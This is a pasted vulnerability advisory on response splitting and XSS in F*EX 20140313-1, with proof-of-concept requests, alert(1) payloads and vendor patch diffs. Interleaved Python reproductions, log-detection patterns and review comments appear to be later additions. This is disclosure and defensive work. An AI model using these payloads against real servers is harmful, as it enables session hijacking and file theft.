F*EX 20140313-1 HTTP Response Splitting / Cross Site Scripting
Pasted by Mayk0, Jun 7th, 2014
Full title: F*EX 20140313-1 HTTP Response Splitting / Cross Site Scripting
Date added: 2014-06-06
Category: web applications
Platform: multiple
Risk: Security Risk Medium
Description: F*EX version 20140313-1 suffers from HTTP response splitting and cross site scripting vulnerabilities.
CVE: CVE-2014-3875, CVE-2014-3876, CVE-2014-3877
========================================

F*EX (Frams' Fast File EXchange) - Multiple Issues
---------------------------------------------------------------------

Affected Versions
=================
F*EX (Frams' Fast File EXchange) 20140313-1 as shipped with Debian.
Version fex-20140530 and later are not affected.

Issue Overview
==============
Technical Risk: medium
Likelihood of Exploitation: high
Vendor: Universität Stuttgart
Vendor URL: http://fex.rus.uni-stuttgart.de/
Credits: LSE Leading Security Experts GmbH employee Eric Sesterhenn
Advisory URL: https://www.lsexperts.de/advisories/lse-2014-05-22.txt
Advisory Status: Public
CVE-Number: CVE-2014-3875, CVE-2014-3876, CVE-2014-3877



Impact
======
It is possible to attack user sessions and to execute JavaScript in
another user's browser. This might enable an attacker to gain access to files
which are intended for other users of the platform.



Issue Description
=================
While conducting an internal evaluation of the software, LSE Leading
Security Experts GmbH discovered multiple, remotely exploitable issues with
F*EX.

1) HTTP Response splitting in rup

CVE-Number: CVE-2014-3875

When inserting encoded newline characters into a request to rup, additional
HTTP headers can be injected into the reply, as well as new HTML code at the
top of the page.

----------------8<-------------
$ nc 127.0.0.1 8888
GET /rup?akey=test%0d%0a%0d%0aHELLO HTTP/1.0

HTTP/1.1 200 OK
X-Message: OK
Server: fexsrv
Expires: 0
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Set-Cookie: akey=test

HELLO; Max-Age=9999; Discard
Content-Type: text/html; charset=UTF-8

<html>
<head>
...
----------------8<-------------

The same attack is possible using a POST request.
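To make the mechanics of the split visible, here is an added example (not F*EX code, and not from the advisory) that reproduces the header block shown above with the same mistake, interpolating the akey value straight into Set-Cookie, then splits the result the way any HTTP client does. The sanitizer at the end is a Python equivalent of the whitelist the vendor patch below applies (`$vv =~ s/[\W]//g`); the response template and the decoded payload string are constructed for this example.

```python
import re

# Constructed stand-in for the header block the advisory shows fexsrv's rup
# emitting; it is not F*EX code, only the same interpolation mistake.
def build_rup_response(akey: str) -> bytes:
    """Interpolate akey straight into Set-Cookie, as the vulnerable rup does."""
    headers = [
        "HTTP/1.1 200 OK",
        "X-Message: OK",
        "Server: fexsrv",
        "Expires: 0",
        "Cache-Control: no-cache",
        "X-Frame-Options: SAMEORIGIN",
        f"Set-Cookie: akey={akey}; Max-Age=9999; Discard",
        "Content-Type: text/html; charset=UTF-8",
    ]
    body = "<html>\n<head>\n</head>\n</html>\n"
    return ("\r\n".join(headers) + "\r\n\r\n" + body).encode("utf-8")


def split_response(raw: bytes) -> tuple[list[str], str]:
    """Split at the first CRLF CRLF, exactly as an HTTP client or proxy does."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head.decode("utf-8").split("\r\n"), body.decode("utf-8")


# The advisory's request value, with %0d%0a%0d%0aHELLO percent-decoded the
# way the server sees it (constructed test input).
INJECTED_AKEY = "test\r\n\r\nHELLO"


def contains_crlf(value: str) -> bool:
    """Defender-side check: a value bound for a header must never carry CR or LF."""
    return "\r" in value or "\n" in value


def sanitize_akey(value: str) -> str:
    """Whitelist equivalent of the vendor patch `$vv =~ s/[\\W]//g`: only
    [A-Za-z0-9_] survive, so CR, LF, quotes and spaces cannot reach a header."""
    return re.sub(r"\W", "", value)


if __name__ == "__main__":
    headers, body = split_response(build_rup_response(INJECTED_AKEY))
    print(headers[-1])   # the header list now ends at "Set-Cookie: akey=test"
    print(body[:28])     # and the attacker-controlled "HELLO; Max-Age=..." is the body
    headers, body = split_response(build_rup_response(sanitize_akey(INJECTED_AKEY)))
    print(headers[-2], "|", body[:6])  # cookie intact, body starts with <html>
```

Note that the vulnerable build produces a response whose header section is cut short at `akey=test` and whose body begins with the attacker's text, which is exactly the nc transcript above; after `sanitize_akey` the CR/LF pairs are gone and the cookie header is whole again.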


2) Cross-Site-Scripting issue in rup

CVE-Number: CVE-2014-3876

The parameter akey is reflected unfiltered as part of the HTML page. Some
characters are forbidden in the GET parameter due to filtering of the
URL, but this can be circumvented by using a POST parameter.
Nevertheless, this issue is exploitable via the GET parameter alone,
with some user interaction.

Opening the following URL opens a popup window when the cursor
moves over the back link at the bottom of the page:

http://127.0.0.1:8888/rup?akey=foo" onmouseover=alert(1) bar="

----------------8<-------------
<p>
<a href="/foc?akey=wow" onmouseover=alert(1) foo="">back to F*EX
operation control</a>
</body></html>
----------------8<-------------


3) Cross-Site-Scripting issue in fup

CVE-Number: CVE-2014-3877

The parameter addto is reflected only slightly filtered back to
the user as part of the HTML page. Some characters are forbidden in the GET
parameter due to filtering of the URL, but this can be circumvented by
using a POST parameter. Nevertheless, this issue is exploitable via the GET
parameter alone, with some user interaction.

Opening the following URL opens a popup window when the cursor
moves over the recipient entry field:

http://127.0.0.1:8888/fup?addto=%22onmouseover=alert%281%29;bar=%22

----------------8<-------------
<tr title="e-mail address or alias"><td>recipient(s):
<td><input type="text" name="to" size="96"
value=""onmouseover=alert(1);bar=""><br>
</tr>
----------------8<-------------



4) Cross-Site-Scripting issue in fuc

CVE-Number: CVE-2014-3876

The POST parameter disclaimer is reflected back to the user as part of the
HTML page.

Setting the disclaimer POST parameter in the change disclaimer
operation (http://127.0.0.1:8888/fuc?disclaimer=CHANGE&akey=2409d2a55e5acfa407929fb10cb8335f)
to the following value

----------------8<-------------
'"><script>alert(1)</script>
----------------8<-------------

results in the following HTML code, which opens a popup window:

----------------8<-------------
<pre>
'"><script>alert(1)</script>
</pre>
<p>
----------------8<-------------

An additional attack is possible using the gm POST parameter, by setting
it to malicious HTML code and supplying the GET parameter group.

Other parameters might be affected as well, since only limited filtering is
performed in the CGI parameter evaluation.
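Issues 2, 3 and 4 share one root cause: values are filtered by stripping a few characters on input instead of being encoded for the HTML context they are printed into. The following added example (not F*EX code and not part of the advisory) rebuilds the three reflection points from the HTML fragments quoted above, renders each with the advisory's payload through the original strip-style filter and through context-appropriate output encoding, and uses Python's own HTML tokenizer to check whether an event handler or script element appeared. The payload strings are the advisory's, percent-decoded; the render functions and the `InjectionProbe` class are constructed for this example.

```python
import html
from html.parser import HTMLParser

# Payloads from the advisory, percent-decoded (constructed test inputs).
RUP_AKEY = 'foo" onmouseover=alert(1) bar="'
FUP_ADDTO = '"onmouseover=alert(1);bar="'
FUC_DISCLAIMER = '\'"><script>alert(1)</script>'


def strip_angle_brackets(value: str) -> str:
    """The pre-patch input filter the advisory describes: only < and > are removed."""
    return value.replace("<", "").replace(">", "")


def unfiltered(value: str) -> str:
    """fuc reflects the disclaimer parameter without any filtering."""
    return value


def attr_value(value: str) -> str:
    """Output encoding for a double-quoted attribute: " becomes &quot; and
    ' becomes &#x27;, so the value can never close the attribute."""
    return html.escape(value, quote=True)


def text_node(value: str) -> str:
    """Output encoding for element content, such as the <pre> block in fuc."""
    return html.escape(value, quote=False)


# The three reflection points, reproduced from the fragments in the advisory;
# `encode` is whichever filter or encoder is applied before printing.
def render_rup_back_link(akey: str, encode) -> str:
    return f'<a href="/foc?akey={encode(akey)}">back to F*EX operation control</a>'


def render_fup_recipient(addto: str, encode) -> str:
    return f'<input type="text" name="to" size="96" value="{encode(addto)}"><br>'


def render_fuc_disclaimer(text: str, encode) -> str:
    return f"<pre>\n{encode(text)}\n</pre>"


class InjectionProbe(HTMLParser):
    """Tokenize a fragment as a browser would and record what should not be
    there: attributes starting with 'on' (event handlers) or a <script> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.event_handlers: list[str] = []
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        self.event_handlers.extend(name for name, _ in attrs if name.startswith("on"))


def injected(fragment: str) -> bool:
    """True if the rendered fragment contains an event handler or script element."""
    probe = InjectionProbe()
    probe.feed(fragment)
    probe.close()
    return bool(probe.event_handlers) or probe.script_tags > 0


if __name__ == "__main__":
    for label, render, payload, weak, strong in [
        ("rup akey", render_rup_back_link, RUP_AKEY, strip_angle_brackets, attr_value),
        ("fup addto", render_fup_recipient, FUP_ADDTO, strip_angle_brackets, attr_value),
        ("fuc disclaimer", render_fuc_disclaimer, FUC_DISCLAIMER, unfiltered, text_node),
    ]:
        print(f"{label}: strip/none -> injected={injected(render(payload, weak))}, "
              f"encoded -> injected={injected(render(payload, strong))}")
```

The rup and fup payloads contain no `<` or `>` at all, which is why a filter that only removes angle brackets does nothing against them: breaking out of a double-quoted attribute needs only a `"`. Encoding on output with the context in mind (attribute versus text node) neutralises all three payloads without having to guess which characters an attacker might use.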



Temporary Workaround and Fix
============================
LSE Leading Security Experts GmbH advises deactivating F*EX until the vendor
publishes a complete fix. LSE Leading Security Experts GmbH recommends
implementing proper filtering for all parameters and proper output encoding
before reflecting values back to the user.
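Where F*EX cannot be taken offline immediately, web server logs can at least show whether the GET variants of these requests have been tried. The following added example (not part of the advisory, not F*EX code) scans access-log lines for the parameters the advisory names on each script and flags decoded values that carry CR/LF, an HTML tag or an event-handler attribute. The log lines are constructed in Apache combined-log format; fexsrv's own log format is not shown in the advisory, so the line regex is an assumption to adapt.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined-log format (fexsrv's real log
# format is not given in the advisory, so LINE_RE below is an assumption).
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jun/2014:10:01:02 +0200] "GET /rup?akey=abc123 HTTP/1.0" 200 512 "-" "curl/7.26.0"
10.0.0.9 - - [06/Jun/2014:10:02:45 +0200] "GET /rup?akey=test%0d%0a%0d%0aHELLO HTTP/1.0" 200 512 "-" "curl/7.26.0"
10.0.0.9 - - [06/Jun/2014:10:03:10 +0200] "GET /rup?akey=foo%22%20onmouseover=alert(1)%20bar=%22 HTTP/1.0" 200 780 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Jun/2014:10:03:40 +0200] "GET /fup?addto=%22onmouseover=alert%281%29;bar=%22 HTTP/1.0" 200 1204 "-" "Mozilla/5.0"
10.0.0.7 - - [06/Jun/2014:10:04:00 +0200] "GET /fup?addto=alice@example.org HTTP/1.0" 200 1204 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Parameters the advisory names per CGI script (gm/group for fuc, issue 4).
WATCHED = {"/rup": {"akey"}, "/fup": {"addto"}, "/fuc": {"disclaimer", "gm"}}

# Indicators, applied to the percent-decoded value.
INDICATORS = [
    ("crlf", re.compile(r"[\r\n]")),                          # response splitting
    ("html-tag", re.compile(r"<[a-zA-Z/]")),                  # fuc-style payload
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),   # rup/fup-style payload
]


def parse_query(target: str) -> tuple[str, dict[str, str]]:
    """Split the request target into path and decoded parameters. Splitting
    only on '&' keeps ';' inside values, which the fup payload relies on."""
    path, _, query = target.partition("?")
    params: dict[str, str] = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[unquote_plus(name)] = unquote_plus(value)
    return path, params


def scan_line(line: str) -> list[dict]:
    """Return one finding per (watched parameter, indicator) hit on this line."""
    m = LINE_RE.match(line)
    if not m:
        return []
    path, params = parse_query(m["target"])
    hits = []
    for name in sorted(WATCHED.get(path, ())):
        value = params.get(name, "")
        for label, pattern in INDICATORS:
            if pattern.search(value):
                hits.append({"ip": m["ip"], "ts": m["ts"], "path": path,
                             "param": name, "indicator": label})
    return hits


def scan_log(text: str) -> list[dict]:
    return [hit for line in text.splitlines() for hit in scan_line(line)]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["path"]} {hit["param"]}: {hit["indicator"]}')
```

Access logs record the request line as received, so the `%0d%0a` sequence stays visible and is decoded here before matching. The advisory notes that each issue also works via POST; POST bodies are not in access logs, so this only surfaces the GET variants, and a reverse proxy or application-level request logging is needed to see the rest.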

1) HTTP Response splitting in rup

  170. - --- rup.orig 2014-05-23 08:50:01.558808000 +0200
  171. +++ rup 2014-05-23 08:55:03.182808000 +0200
  172. @@ -35,6 +35,7 @@ foreach my $v (param) {
  173. $vv =~ s/[<>]//g;
  174. if ($v =~ /^akey$/i) {
  175. $vv =~ s:[/.]::g;
  176. + $vv =~ s/[\W]//g;
  177. $akey = untaint($vv);
  178. } elsif ($v =~ /^(from|user)$/i) {
  179. $from = normalize_address($vv);
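Review bot: the added `$vv =~ s/[\W]//g;` reduces akey to `[A-Za-z0-9_]`, which removes the CR/LF needed for the Set-Cookie injection and the quote and space characters used in the rup XSS payload, so it does address both reported issues in rup; two things to note. First, it makes the preceding `$vv =~ s:[/.]::g;` redundant, since `/` and `.` are already non-word characters. Second, only the `akey` branch is covered: the generic `$vv =~ s/[<>]//g;` above it still lets CR, LF and quotes through for every other parameter handled by this loop, so the same check (or output encoding where the values are printed) is needed there. The hunk is shown in PGP dash-escaped form (`- ---` stands for `---`), so un-escape it before handing it to `patch`.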


2) Cross-Site-Scripting issue in rup

The patch from 1) is sufficient to fix this issue as well.



3) Cross-Site-Scripting issue in fup

  189. - --- fup.orig 2014-05-23 09:26:12.514808000 +0200
  190. +++ fup 2014-05-23 09:26:53.794808000 +0200
  191. @@ -2551,7 +2551,7 @@ sub setparam {
  192. $replyto = untaint($replyto);
  193. } elsif ($v eq 'ADDTO') {
  194. $vv =~ s/\s.*//;
  195. - - $vv =~ s/[<>]//g;
  196. + $vv =~ s/[<>"']//g;
  197. $addto = untaint(lc($vv)); # if checkaddress($vv);
  198. } elsif ($v eq 'SUBMIT') {
  199. $submit = $vv;
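Review bot: widening the strip list to `[<>"']` stops the reported `"onmouseover=...` value from closing the double-quoted `value=""` attribute, but it is still a character blacklist applied at input rather than encoding at output: `$addto` reaches the page raw, so any other context it is printed into is unprotected, and legitimate addresses containing quotes are silently mangled. The preceding `$vv =~ s/\s.*//;` also shows why the advisory's payload uses `;` instead of whitespace as a separator; a filter that relies on truncation at the first space is easy to route around. The commented-out `# if checkaddress($vv);` suggests a positive address check already exists; validating the value against that and rejecting on failure, combined with HTML-encoding where it is printed (as section 4 of the advisory recommends), would be the more robust fix. The `- - $vv` line is the PGP dash-escaped form of the removed line `-$vv ...`.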


4) Cross-Site-Scripting issue in fuc

No workaround from LSE. All parameters need to be filtered properly
and HTML encoded when reflected back to the user.



History
=======
2014-05-22 Issue discovered
2014-05-23 Issue reported
2014-05-23 Vendor reply
2014-05-26 Internal test version supplied by vendor
2014-05-26 Vendor releases a patch
2014-05-30 CVE-Numbers assigned
2014-06-03 Advisory released